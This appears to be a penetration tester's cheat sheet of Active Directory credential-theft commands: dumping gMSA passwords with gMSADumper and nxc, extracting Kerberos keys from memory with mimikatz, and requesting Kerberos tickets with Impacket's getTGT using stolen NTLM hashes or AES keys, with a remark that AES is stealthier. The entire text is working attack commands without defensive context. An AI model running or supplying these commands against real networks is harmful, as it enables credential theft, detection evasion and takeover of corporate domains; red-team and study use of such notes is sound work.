python3 gMSADumper.py -u user -p password -d domain.local
.\mimikatz.exe 'sekurlsa::ekeys' 'exit'
# grab rc4_hmac_nt
python getTGT.py <domain_name>/<user_name> -hashes [lm_hash]:<ntlm_hash>
Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)
python getTGT.py <domain_name>/<user_name> -aesKey <aes_key>
python getTGT.py <domain_name>/<user_name>:[password]
nxc ldap <host> -u <user> -p <password> --gmsa